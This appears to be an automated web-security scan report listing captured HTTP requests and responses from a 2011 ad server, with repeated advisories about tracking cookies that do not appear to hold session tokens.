GET /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:05:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1021 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:06:22 GMT;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/ HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:02:21 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFL=011Pj2x3U10EfJ|U10Eo1|U10yOK|U1014lt|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 414 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:21 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiQmF81012Mr|O1016GB; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:37 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3623 Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:40 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:39:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1013 Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:44 GMT;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 14:31:36 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2979 Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 06:22:37 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:58:07 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:09 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:31:22 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:24 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:27:15 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:17 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:23:08 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:10 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:39:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 217 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:47 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:55 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:57 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:02:23 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:25 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:19:01 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:03 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:58:16 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:18 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:41 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:43 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:10:47 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:49 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:14:54 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:56 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:03:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:43 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:03:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:03 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:02:37 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:37 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:04:15 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:15 GMT;path=/
